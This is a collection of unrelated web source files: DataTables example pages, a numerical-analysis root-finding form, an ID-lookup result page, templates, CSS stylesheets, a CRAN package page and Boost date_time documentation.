<td>Team Leader</td>
<td>San Francisco</td>
<td>22</td>
<td>2008/10/26</td>
<td>$235,500</td>
</tr>
<tr>
<td>Martena Mccray</td>
<td>Post-Sales support</td>
<td>Edinburgh</td>
<td>46</td>
<td>2011/03/09</td>
<td>$324,050</td>
</tr>
<tr>
<td>Unity Butler</td>
<td>Marketing Designer</td>
<td>San Francisco</td>
<td>47</td>
<td>2009/12/09</td>
<td>$85,675</td>
</tr>
<tr>
<td>Howard Hatfield</td>
<td>Office Manager</td>
<td>San Francisco</td>
<td>51</td>
<td>2008/12/16</td>
<td>$164,500</td>
</tr>
<tr>
<td>Hope Fuentes</td>
<td>Secretary</td>
<td>San Francisco</td>
<td>41</td>
<td>2010/02/12</td>
<td>$109,850</td>
</tr>
<tr>
<td>Vivian Harrell</td>
<td>Financial Controller</td>
<td>San Francisco</td>
<td>62</td>
<td>2009/02/14</td>
<td>$452,500</td>
</tr>
<tr>
<td>Timothy Mooney</td>
<td>Office Manager</td>
<td>London</td>
<td>37</td>
<td>2008/12/11</td>
<td>$136,200</td>
</tr>
<tr>
<td>Jackson Bradshaw</td>
<td>Director</td>
<td>New York</td>
<td>65</td>
<td>2008/09/26</td>
<td>$645,750</td>
</tr>
<tr>
<td>Olivia Liang</td>
<td>Support Engineer</td>
<td>Singapore</td>
<td>64</td>
<td>2011/02/03</td>
<td>$234,500</td>
</tr>
<tr>
<td>Bruno Nash</td>
<td>Software Engineer</td>
<td>London</td>
<td>38</td>
<td>2011/05/03</td>
<td>$163,500</td>
</tr>
<tr>
<td>Sakura Yamamoto</td>
<td>Support Engineer</td>
<td>Tokyo</td>
<td>37</td>
<td>2009/08/19</td>
<td>$139,575</td>
</tr>
<tr>
<td>Thor Walton</td>
<td>Developer</td>
<td>New York</td>
<td>61</td>
<td>2013/08/11</td>
<td>$98,540</td>
</tr>
<tr>
<td>Finn Camacho</td>
<td>Support Engineer</td>
<td>San Francisco</td>
<td>47</td>
<td>2009/07/07</td>
<td>$87,500</td>
</tr>
<tr>
<td>Serge Balmkcin</td>
<td>Data Coordinator</td>
<td>Singapore</td>
<td>64</td>
<td>2012/04/09</td>
<td>$138,575</td>
</tr>
<tr>
<td>Zenaida Frank</td>
<td>Software Engineer</td>
<td>New York</td>
<td>63</td>
<td>2010/01/04</td>
<td>$125,250</td>
</tr>
<tr>
<td>Zorita Serrano</td>
<td>Software Engineer</td>
<td>San Francisco</td>
<td>56</td>
<td>2012/06/01</td>
<td>$115,000</td>
</tr>
<tr>
<td>Jennifer Acosta</td>
<td>Junior Javascript Developer</td>
<td>Edinburgh</td>
<td>43</td>
<td>2013/02/01</td>
<td>$75,650</td>
</tr>
<tr>
<td>Cara Stevens</td>
<td>Sales Assistant</td>
<td>New York</td>
<td>46</td>
<td>2011/12/06</td>
<td>$145,600</td>
</tr>
<tr>
<td>Hermione Butler</td>
<td>Regional Director</td>
<td>London</td>
<td>47</td>
<td>2011/03/21</td>
<td>$356,250</td>
</tr>
<tr>
<td>Lael Greer</td>
<td>Systems Administrator</td>
<td>London</td>
<td>21</td>
<td>2009/02/27</td>
<td>$103,500</td>
</tr>
<tr>
<td>Jonas Alexander</td>
<td>Developer</td>
<td>San Francisco</td>
<td>30</td>
<td>2010/07/14</td>
<td>$86,500</td>
</tr>
<tr>
<td>Shad Decker</td>
<td>Regional Director</td>
<td>Edinburgh</td>
<td>51</td>
<td>2008/11/13</td>
<td>$183,000</td>
</tr>
<tr>
<td>Michael Bruce</td>
<td>Javascript Developer</td>
<td>Singapore</td>
<td>29</td>
<td>2011/06/27</td>
<td>$183,000</td>
</tr>
<tr>
<td>Donna Snider</td>
<td>Customer Support</td>
<td>New York</td>
<td>27</td>
<td>2011/01/25</td>
<td>$112,000</td>
</tr>
</tbody>
</table>
<ul class="tabs">
<li class="active">Javascript</li>
<li>HTML</li>
<li>CSS</li>
<li>Ajax</li>
<li>Server-side script</li>
</ul>
<div class="tabs">
<div class="js">
<p>The Javascript shown below is used to initialise the table shown in this example:</p><code class="multiline language-js">$(document).ready(function() {
$('#example').DataTable( {
dom: 'T<"clear">lfrtip',
tableTools: {
"aButtons": [
"copy",
"csv",
"xls",
{
"sExtends": "pdf",
"sPdfOrientation": "landscape",
"sPdfMessage": "Your custom message would go here."
},
"print"
]
}
} );
} );</code>
<p>In addition to the above code, the following Javascript library files are loaded for use in this example:</p>
<ul>
<li><a href="../../../media/js/jquery.js">../../../media/js/jquery.js</a></li>
<li><a href="../../../media/js/jquery.dataTables.js">../../../media/js/jquery.dataTables.js</a></li>
<li><a href="../js/dataTables.tableTools.js">../js/dataTables.tableTools.js</a></li>
</ul>
</div>
<div class="table">
<p>The HTML shown below is the raw HTML table element, before it has been enhanced by DataTables:</p>
</div>
<div class="css">
<div>
<p>This example uses a little bit of additional CSS beyond what is loaded from the library files (below), in order to correctly display the table. The
additional CSS used is shown below:</p><code class="multiline language-css"></code>
</div>
<p>The following CSS library files are loaded for use in this example to provide the styling of the table:</p>
<ul>
<li><a href="../../../media/css/jquery.dataTables.css">../../../media/css/jquery.dataTables.css</a></li>
<li><a href="../css/dataTables.tableTools.css">../css/dataTables.tableTools.css</a></li>
</ul>
</div>
<div class="ajax">
<p>This table loads data by Ajax. The latest data that has been loaded is shown below. This data will update automatically as any additional data is
loaded.</p>
</div>
<div class="php">
<p>The script used to perform the server-side processing for this table is shown below. Please note that this is just an example script using PHP. Server-side
processing scripts can be written in any language, using <a href="//datatables.net/manual/server-side">the protocol described in the DataTables
documentation</a>.</p>
</div>
</div>
</section>
</div>
<section>
<div class="footer">
<div class="gradient"></div>
<div class="liner">
<h2>Other examples</h2>
<div class="toc">
<div class="toc-group">
<h3><a href="./index.html">Examples</a></h3>
<ul class="toc active">
<li><a href="./simple.html">Basic initialisation</a></li>
<li><a href="./swf_path.html">Setting the SWF path</a></li>
<li><a href="./new_init.html">Initialisation with `new`</a></li>
<li><a href="./defaults.html">Defaults</a></li>
<li><a href="./select_single.html">Row selection - single row select</a></li>
<li><a href="./select_multi.html">Row selection - multi-row select</a></li>
<li><a href="./select_os.html">Row selection - operating system style</a></li>
<li><a href="./select_column.html">Row selection - row selector on specific cells</a></li>
<li><a href="./multiple_tables.html">Multiple tables</a></li>
<li><a href="./multi_instance.html">Multiple toolbars</a></li>
<li><a href="./collection.html">Button collections</a></li>
<li><a href="./plug-in.html">Plug-in button types</a></li>
<li><a href="./button_text.html">Custom button text</a></li>
<li><a href="./alter_buttons.html">Button arrangement</a></li>
<li><a href="./ajax.html">Ajax loaded data</a></li>
<li class="active"><a href="./pdf_message.html">PDF message</a></li>
<li><a href="./bootstrap.html">Bootstrap styling</a></li>
<li><a href="./jqueryui.html">jQuery UI styling</a></li>
</ul>
</div>
</div>
<div class="epilogue">
<p>Please refer to the <a href="http://www.datatables.net">DataTables documentation</a> for full information about its API properties and methods.<br>
Additionally, there are a wide range of <a href="http://www.datatables.net/extras">extras</a> and <a href="http://www.datatables.net/plug-ins">plug-ins</a>
which extend the capabilities of DataTables.</p>
<p class="copyright">DataTables designed and created by <a href="http://www.sprymedia.co.uk">SpryMedia Ltd</a> © 2007-2015<br>
DataTables is licensed under the <a href="http://www.datatables.net/mit">MIT license</a>.</p>
</div>
</div>
</div>
</section>
</body>
</html> |
FECG-EncuentraRaizPuntoFijo/FECG-EncuentraRaizPuntoFijo.html | Franko1307/AnalisisNumerico |
<!--
Nombre: FECG-EncuentraRaizPuntoFijo.html
Fecha: 15/9/2015
Autor : Francisco Enrique Cordova Gonzalez
Descripcion: Este programa genera aproximaciones a raices de ecuaciones con punto fijo y ademas grafica la ecuacion.
-->
<!DOCTYPE HTML>
<html>
<head>
<title>FECG-EncuentraRaizPuntoFijo</title>
<script src="http://cdnjs.cloudflare.com/ajax/libs/mathjs/2.2.0/math.min.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/d3/3.5.5/d3.min.js"></script>
<script src="http://brcdn.org/RbDt4b0Shej4JLF7KBQEilNbIiI.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjs/2.2.0/math.min.js"></script>
<script type="text/javascript"
src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<link rel="stylesheet" type="text/css" href="style.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src = "FECG-EncuentraRaizPuntoFijo.js">
</script>
</head>
<body>
<div id = "titulo">
$$Valor\,aproximado\,de\,una\,raiz\,usando\,punto\,fijo$$
</div>
<form id = "caja">
<p>Programa que genera aproximaciones de raices de ecuaciones</p>
<div>
<label for = "Fx">\(f(x):\) </label>
<input type ="text" id="Fx" value="x^3 + 4x^2 - 10">
</div>
<div>
<label for = "x">\(g(x):\) </label>
<input type = "text" id = "x" value = "sqrt(10/(x+4))">
</div>
<div>
<label for = "a">\(a:\)</label>
<input type = "text" id = "a" value = "0">
</div>
<div>
<label for = "b">\(b:\)</label>
<input type = "text" id = "b" value = "2">
</div>
<div>
<label for = "Max-Iteraciones">\(Iteraciones:\)</label>
<input type = "text" id = "Max-Iteraciones" value = "50">
</div>
<div>
<label for "tolerancia">\(Tolerancia:\)</label>
<input type = "text" id = "tolerancia" value = "0.0001">
</div>
<div class = "button">
<button type = "button" id = "calcula" value = "calcular">calcular</button>
</div>
</form>
<div id = "grafica">
</div>
<div id = "raiz"></div>
<table id="table-2">
<thead>
<th>$$n$$</th>
<th>$$p_n$$</th>
<th>$$f(p_n)$$</th>
<th>$$error\,\,\,\frac{(p_n-p_{n-1})}{p_n}$$</th>
</thead>
<tbody id = "tabla-2">
</tbody>
</table>
</body>
</html> |
hasil.html | thexzan/Infoktp | <!DOCTYPE HTML>
<html>
<head>
<meta charset="UTF-8">
<title>Cek keaslian data KTP - InfoKTP</title>
<link rel="stylesheet" type="text/css" href="style.css">
<link rel="icon" type="image/ico" href="favicon.ico">
</head>
<body>
<div id="wrapper">
<div id="logo">
<h1>info<span>KTP</span></h1>
<h2>Cek Keaslian Data KTP</h2>
</div>
<div id="konten-hasil">
<div id="sirah">
<p>Data KTP berdasarkan Nomor KTP</p>
<p>1234567891234567</p></div>
<div id="kotak">
<p>Jenis Kelamin : Laki Laki</p>
<p>Tanggal Lahir : 5 Maret 1970</p>
<p>Kecamatan : Depok</p>
<p>Kota / Kabupaten : Sleman</p>
<p>Provinsi : Yogyakarta</p>
</div>
<span class="tombol"><a href="index.html">Cek Lainnya</a></span>
</div>
<footer>Copyright (c) 2013 | Dikembangkan Oleh <a title='Jasa Pembuatan Website' href="http://jogjawebsite.net">JogjaWebsite</a> </footer>
</div>
</body>
</html> |
html/ref.detail.html | cria/microSICol | <!-- ref.detail.html -->
<div id="above_data">
<p>
<a href="javascript:show('general');" id="tab_general" class="on_menu">%(menu_References_General)s</a>
<a href="javascript:show('security');" id="tab_security">%(menu_References_Security)s</a>
</p>
</div>
<div class="data" id="general">
<p><label>%(label_References_General_Code)s</label> %(id)s</p>
<p><label>%(label_References_General_Title)s</label><br />%(title)s</p>
<div class="detail">
<table border="0" cellspacing="0" class="table_1">
<tr>
<td class="cols_3">
<p><label>%(label_References_General_Author)s</label><br />%(author)s</p>
</td>
<td class="cols_3"></td>
<td class="cols_3">
<p><label>%(label_References_General_Year)s</label><br />%(year)s</p>
</td>
</tr>
</table>
</div>
<p><label>%(label_References_General_URL)s</label><br />%(url)s</p>
<p><label>%(label_References_General_Comments)s</label><br />%(comments_langs)s</p>
</div>
<div class="data" id="security">
<p>
<label>%(label_go_catalog)s</label>
</p>
<p>
<table>
<tr>
<td> </td>
<th>%(label_Permission)s</th>
</tr>
%(groups_table)s
</table>
</p>
</div>
%(hidden_forms)s
<!-- END - ref.detail.html -->
|
public/css/style.css | onedr0p/manage-this-node | /* --------------------------------
Primary style
-------------------------------- */
*, *::after, *::before {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
*::after, *::before {
content: '';
}
body {
font-size: 0px;
font-family: "PT Sans", sans-serif;
}
a {
text-decoration: none;
}
a:hover, a:visited, a:link, a:active
{
text-decoration: none;
}
iframe {
width: 100%;
height: 926px;
background-color: #fff;
}
.input-sm {
background-color: lightgray;
color: black;
}
/* --------------------------------
Main components
-------------------------------- */
/* Tab Nav */
.cd-tabs nav {
-webkit-overflow-scrolling: touch;
box-shadow: inset 0 -2px 3px rgba(203, 196, 130, 0.06);
}
.cd-tabs-navigation li {
-webkit-touch-callout: none; /* iOS Safari */
-webkit-user-select: none; /* Chrome/Safari/Opera */
-khtml-user-select: none; /* Konqueror */
-moz-user-select: none; /* Firefox */
-ms-user-select: none; /* Internet Explorer/Edge */
user-select: none; /* Non-prefixed version, currently
not supported by any browser */
background-color: #343843; /* Main nav colour */
}
/*Only show box shadows on mobile view*/
@media only screen and (max-width: 991px) {
.cd-tabs-navigation li {
box-shadow: inset 0 -2px 3px rgba(203, 196, 130, 0.06);
}
}
.cd-tabs-navigation a, #reload {
text-align: center;
font-size: 14px;
font-size: 0.875rem;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
font-weight: 700;
}
#reload, .cd-tabs-navigation li {
cursor: pointer;
}
.no-touch .cd-tabs-navigation a:hover, #reload:hover {
color: #f1f3f2; /* Hover text colour */
background-color: rgba(233, 230, 202, 0.3);
}
.cd-tabs-navigation a.selected:not(#reload) {
background-color: #41434f !important; /* Selected tab colour */
color: #f1f3f2; /* Selected text colour */
box-shadow: inset 0 5px 0 #31ac63; /* Selected tab marker colour */
}
.cd-tabs-navigation {
/* tabbed on top of devices */
width: 100%;
background-color: #343843; /* Main nav colour */
box-shadow: inset 0 -2px 3px rgba(203, 196, 130, 0.06);
}
/* End Tab Nav */
/* Tab Content */
.cd-tabs-content {
background: #36363b; /* Content background colour */
}
.cd-tabs-content li {
display: none;
padding: 0;
}
.cd-tabs-content li.selected {
display: block;
-webkit-animation: cd-fade-in 0.5s;
-moz-animation: cd-fade-in 0.5s;
animation: cd-fade-in 0.5s;
}
.cd-tabs-content li p {
font-size: 14px;
font-size: 0.875rem;
line-height: 1.6;
color: #8493bf;
margin-bottom: 2em;
}
.modal {
font-size: 14px;
color: #8493bf;
}
.modal-header {
font-weight: bold;
padding:9px 15px;
border-bottom:1px solid #8493bf;
background-color: #343843;
-webkit-border-top-left-radius: 5px;
-webkit-border-top-right-radius: 5px;
-moz-border-radius-topleft: 5px;
-moz-border-radius-topright: 5px;
border-top-left-radius: 5px;
border-top-right-radius: 5px;
}
.modal-content {
background-color: #41434f;
}
.modal-footer {
padding:9px 15px;
border-top:1px solid #8493bf;
background-color: #343843;
-webkit-border-bottom-left-radius: 5px;
-webkit-border-bottom-right-radius: 5px;
-moz-border-radius-bottomleft: 5px;
-moz-border-radius-bottomright: 5px;
border-bottom-left-radius: 5px;
border-bottom-right-radius: 5px;
}
.modal .close {
padding: 0 10px;
color: #ffffff;
background-color: rgba(233, 230, 202, 0.7);
border-style: solid;
border-width: 1px;
border-color: #8493bf;
font-weight: bold;
}
@media only screen and (min-width: 0px) {
.cd-tabs-content {
min-height: 0;
}
.cd-tabs-content li {
padding: 0;
}
.cd-tabs-content li p {
font-size: 16px;
font-size: 1rem;
}
}
@-webkit-keyframes cd-fade-in {
0% {
opacity: 0;
}
100% {
opacity: 1;
}
}
@-moz-keyframes cd-fade-in {
0% {
opacity: 0;
}
100% {
opacity: 1;
}
}
@keyframes cd-fade-in {
0% {
opacity: 0;
}
100% {
opacity: 1;
body {
margin: 0px;
padding: 0px;
} |
Code/GetMetaDataFromCRAN/raw_html/l2boost.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package l2boost</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="citation_title" content="l2boost - Friedman's boosting algorithm for regularized linear
regression [R package l2boost version 1.0]" />
<meta name="citation_author1" content="John Ehrlinger" />
<meta name="citation_author2" content="Hemant Ishwaran" />
<meta name="citation_publication_date.Published" content="2013-06-03" />
<meta name="citation_public_url" content="https://CRAN.R-project.org/package=l2boost" />
<meta name="DC.identifier" content="https://CRAN.R-project.org/package=l2boost" />
<meta name="DC.publisher" content="Comprehensive R Archive Network (CRAN)" />
<style type="text/css">
table td { vertical-align: top; }
</style>
</head>
<body>
<h2>l2boost: l2boost - Friedman's boosting algorithm for regularized linear
regression</h2>
<p>Efficient implementation of Friedman's boosting algorithm
with l2-loss function and coordinate direction (design matrix
columns) basis functions.</p>
<table summary="Package l2boost summary">
<tr>
<td>Version:</td>
<td>1.0</td>
</tr>
<tr>
<td>Depends:</td>
<td>R (≥ 2.14.0), <a href="../MASS/index.html">MASS</a>, parallel</td>
</tr>
<tr>
<td>Published:</td>
<td>2013-06-03</td>
</tr>
<tr>
<td>Author:</td>
<td>John Ehrlinger [aut, cre], Hemant Ishwaran [aut]</td>
</tr>
<tr>
<td>Maintainer:</td>
<td>John Ehrlinger <john.ehrlinger at gmail.com></td>
</tr>
<tr>
<td>License:</td>
<td><a href="../../licenses/GPL-2">GPL-2</a> | <a href="../../licenses/GPL-3">GPL-3</a> [expanded from: GPL (≥ 2)]</td>
</tr>
<tr>
<td>NeedsCompilation:</td>
<td>no</td>
</tr>
<tr>
<td>Citation:</td>
<td><a href="citation.html">l2boost citation info</a> </td>
</tr>
<tr>
<td>Materials:</td>
<td><a href="README.html">README</a> </td>
</tr>
<tr>
<td>CRAN checks:</td>
<td><a href="../../checks/check_results_l2boost.html">l2boost results</a></td>
</tr>
</table>
<h4>Downloads:</h4>
<table summary="Package l2boost downloads">
<tr>
<td> Reference manual: </td>
<td> <a href="l2boost.pdf"> l2boost.pdf </a> </td>
</tr>
<tr>
<td> Package source: </td>
<td> <a href="../../../src/contrib/l2boost_1.0.tar.gz"> l2boost_1.0.tar.gz </a> </td>
</tr>
<tr>
<td> Windows binaries: </td>
<td> r-devel: <a href="../../../bin/windows/contrib/3.5/l2boost_1.0.zip">l2boost_1.0.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/l2boost_1.0.zip">l2boost_1.0.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/l2boost_1.0.zip">l2boost_1.0.zip</a> </td>
</tr>
<tr>
<td> OS X El Capitan binaries: </td>
<td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/l2boost_1.0.tgz">l2boost_1.0.tgz</a> </td>
</tr>
<tr>
<td> OS X Mavericks binaries: </td>
<td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/l2boost_1.0.tgz">l2boost_1.0.tgz</a> </td>
</tr>
</table>
<h4>Linking:</h4>
<p>Please use the canonical form
<a href="https://CRAN.R-project.org/package=l2boost"><samp>https://CRAN.R-project.org/package=l2boost</samp></a>
to link to this page.</p>
</body>
</html>
|
client/main.html | benderskiy/svetashead | <head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width" />
<title>Svetashead</title>
</head>
<!-- THEN GOES LAYOUT (layout.html) --> |
client/vtr/listvtr.html | laskuvarjotoimikunta/vtr | <template name="listVtr">
<div class="pull-right"><a href="{{pathFor 'exportVtr'}}">Export</a></div>
{{#with ownVtr}}
{{#if count}}
<div class="page-header">
<h1>Omat ilmoituksesi ({{count}} kpl)</h1>
</div>
{{#each this}}
{{>itemVtr}}
{{/each}}
{{/if}}
{{/with}}
{{#with dzVtr}}
{{#if count}}
<div class="page-header">
<h1>Yhteisösi ilmoitukset ({{count}} kpl)</h1>
</div>
{{#each this}}
{{>itemVtr}}
{{/each}}
{{/if}}
{{/with}}
{{#if isInRole 'admin'}}
{{#with allVtr}}
{{#if count}}
<div class="page-header">
<h1>Kaikki ilmoitukset ({{count}} kpl)</h1>
Näet nämä, koska olet admin.
</div>
{{#each this}}
{{>itemVtr}}
{{/each}}
{{/if}}
{{/with}}
{{/if}}
</template>
|
wp-content/themes/justwrite/assets/css/es-style6.css | bechirbenhammed/critiques | /* Editor Style - Font Style 6 */
body{font-family:"Open Sans",sans-serif;}
h1,h2,h3,h4,h5,h6{font-family:"Roboto Slab",sans-serif;} |
doc/fltneq.html | bmajoros/Epsilon | <h2>Float::notEqual: N</h2>
<br><b>Description:</b>
<br>Returns <i>false</i> if self's floating-point value is equal to
the value of N; <i>true</i> otherwise. N must be a Float object,
<i>not</i> an <a href="integer.html">Integer</a>.
<p><b>Return value:</b> true or false |
boost/doc/html/boost/date_time/time_zone_names_base.html | geodynamics/gale | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Class template time_zone_names_base</title>
<link rel="stylesheet" href="../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../index.html" title="The Boost C++ Libraries BoostBook Documentation Subset">
<link rel="up" href="../../date_time/doxy.html#header.boost.date_time.time_zone_names_hpp" title="Header <boost/date_time/time_zone_names.hpp>">
<link rel="prev" href="default_zone_names.html" title="Struct template default_zone_names">
<link rel="next" href="data_not_accessible.html" title="Class data_not_accessible">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../boost.png"></td>
<td align="center"><a href="../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="default_zone_names.html"><img src="../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../date_time/doxy.html#header.boost.date_time.time_zone_names_hpp"><img src="../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="data_not_accessible.html"><img src="../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="refentry">
<a name="boost.date_time.time_zone_names_base"></a><div class="titlepage"></div>
<div class="refnamediv">
<h2><span class="refentrytitle">Class template time_zone_names_base</span></h2>
<p>boost::date_time::time_zone_names_base — Base type that holds various string names for timezone output. </p>
</div>
<h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2>
<div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: <<a class="link" href="../../date_time/doxy.html#header.boost.date_time.time_zone_names_hpp" title="Header <boost/date_time/time_zone_names.hpp>">boost/date_time/time_zone_names.hpp</a>>
</span><span class="keyword">template</span><span class="special"><</span><span class="keyword">typename</span> CharT<span class="special">></span>
<span class="keyword">class</span> <a class="link" href="time_zone_names_base.html" title="Class template time_zone_names_base">time_zone_names_base</a> <span class="special">{</span>
<span class="keyword">public</span><span class="special">:</span>
<span class="comment">// types</span>
<span class="keyword">typedef</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">basic_string</span><span class="special"><</span> <span class="identifier">CharT</span> <span class="special">></span> <a name="boost.date_time.time_zone_names_base.string_type"></a><span class="identifier">string_type</span><span class="special">;</span>
<span class="comment">// <a class="link" href="time_zone_names_base.html#boost.date_time.time_zone_names_baseconstruct-copy-destruct">construct/copy/destruct</a></span>
<a class="link" href="time_zone_names_base.html#id468663-bb"><span class="identifier">time_zone_names_base</span></a><span class="special">(</span><span class="special">)</span><span class="special">;</span>
<a class="link" href="time_zone_names_base.html#id468664-bb"><span class="identifier">time_zone_names_base</span></a><span class="special">(</span><span class="keyword">const</span> <span class="identifier">string_type</span> <span class="special">&</span><span class="special">,</span> <span class="keyword">const</span> <span class="identifier">string_type</span> <span class="special">&</span><span class="special">,</span>
<span class="keyword">const</span> <span class="identifier">string_type</span> <span class="special">&</span><span class="special">,</span> <span class="keyword">const</span> <span class="identifier">string_type</span> <span class="special">&</span><span class="special">)</span><span class="special">;</span>
<span class="comment">// <a class="link" href="time_zone_names_base.html#id443834-bb">public member functions</a></span>
<span class="identifier">string_type</span> <a class="link" href="time_zone_names_base.html#id443837-bb"><span class="identifier">dst_zone_abbrev</span></a><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="identifier">string_type</span> <a class="link" href="time_zone_names_base.html#id468640-bb"><span class="identifier">std_zone_abbrev</span></a><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="identifier">string_type</span> <a class="link" href="time_zone_names_base.html#id468648-bb"><span class="identifier">dst_zone_name</span></a><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="identifier">string_type</span> <a class="link" href="time_zone_names_base.html#id468655-bb"><span class="identifier">std_zone_name</span></a><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="special">}</span><span class="special">;</span></pre></div>
<div class="refsect1">
<a name="id1295679"></a><h2>Description</h2>
<p>Class that holds various types of strings used for timezones. For example, for the western United States there is the full name: Pacific Standard Time and the abbreviated name: PST. During daylight savings there are additional names: Pacific Daylight Time and PDT. CharT Allows class to support different character types </p>
<div class="refsect2">
<a name="id1295690"></a><h3>
<a name="boost.date_time.time_zone_names_baseconstruct-copy-destruct"></a><code class="computeroutput">time_zone_names_base</code>
public
construct/copy/destruct</h3>
<div class="orderedlist"><ol class="orderedlist" type="1">
<li class="listitem"><pre class="literallayout"><a name="id468663-bb"></a><span class="identifier">time_zone_names_base</span><span class="special">(</span><span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><a name="id468664-bb"></a><span class="identifier">time_zone_names_base</span><span class="special">(</span><span class="keyword">const</span> <span class="identifier">string_type</span> <span class="special">&</span> std_zone_name_str<span class="special">,</span>
<span class="keyword">const</span> <span class="identifier">string_type</span> <span class="special">&</span> std_zone_abbrev_str<span class="special">,</span>
<span class="keyword">const</span> <span class="identifier">string_type</span> <span class="special">&</span> dst_zone_name_str<span class="special">,</span>
<span class="keyword">const</span> <span class="identifier">string_type</span> <span class="special">&</span> dst_zone_abbrev_str<span class="special">)</span><span class="special">;</span></pre></li>
</ol></div>
</div>
<div class="refsect2">
<a name="id1295854"></a><h3>
<a name="id443834-bb"></a><code class="computeroutput">time_zone_names_base</code> public member functions</h3>
<div class="orderedlist"><ol class="orderedlist" type="1">
<li class="listitem"><pre class="literallayout"><span class="identifier">string_type</span> <a name="id443837-bb"></a><span class="identifier">dst_zone_abbrev</span><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="identifier">string_type</span> <a name="id468640-bb"></a><span class="identifier">std_zone_abbrev</span><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="identifier">string_type</span> <a name="id468648-bb"></a><span class="identifier">dst_zone_name</span><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="identifier">string_type</span> <a name="id468655-bb"></a><span class="identifier">std_zone_name</span><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li>
</ol></div>
</div>
</div>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2001-2005 CrystalClear Software, Inc<p>Subject to the Boost Software License, Version 1.0. (See accompanying file
<code class="filename">LICENSE_1_0.txt</code> or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="default_zone_names.html"><img src="../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../date_time/doxy.html#header.boost.date_time.time_zone_names_hpp"><img src="../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="data_not_accessible.html"><img src="../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
css/eva.css | dolfinitylearning/eva | /** {
margin: 0;
padding: 0;
}
body {
font-family: sans-serif;
padding: 1em;
}
p {
margin-top: 0.5em;
margin-bottom: 1em;
}*/
.eva-wrapper {
margin-top: 2em;
margin-bottom: 2em;
}
.eva-spreadsheet {
padding: 5px;
border: 2px solid #C7C4C4;
margin-left: 5px;
margin-right: 5px;
}
.eva-spreadsheet table {
width: 100%;
padding: 5px;
}
.eva-spreadsheet table tr {
width: 100%;
}
.eva-spreadsheet table tr th {
text-align: center;
padding-right: 0.5em;
}
.eva-spreadsheet table tr td {
}
.eva-spreadsheet table tr td input {
width: 100%;
padding: 2px;
}
.runtime-error {
color: red;
}
.eva-component-explanation {
font-size: 80%;
margin-left: 8px;
color: green;
}
.eva-cpu-element-explanation {
font-size: 80%;
display: block;
margin-top: 5px;
color: green;
}
.eva-run-status-container .eva-cpu-element-explanation {
max-width: 100px;
}
.eva-next-instruction-container .eva-cpu-element-explanation {
max-width: 110px;
}
.eva-evaluator-container .eva-cpu-element-explanation {
max-width: 200px;
}
.eva-cpu-container {
margin: 5px;
padding: 5px;
background-color: bisque;
}
.eva-cpu-components {
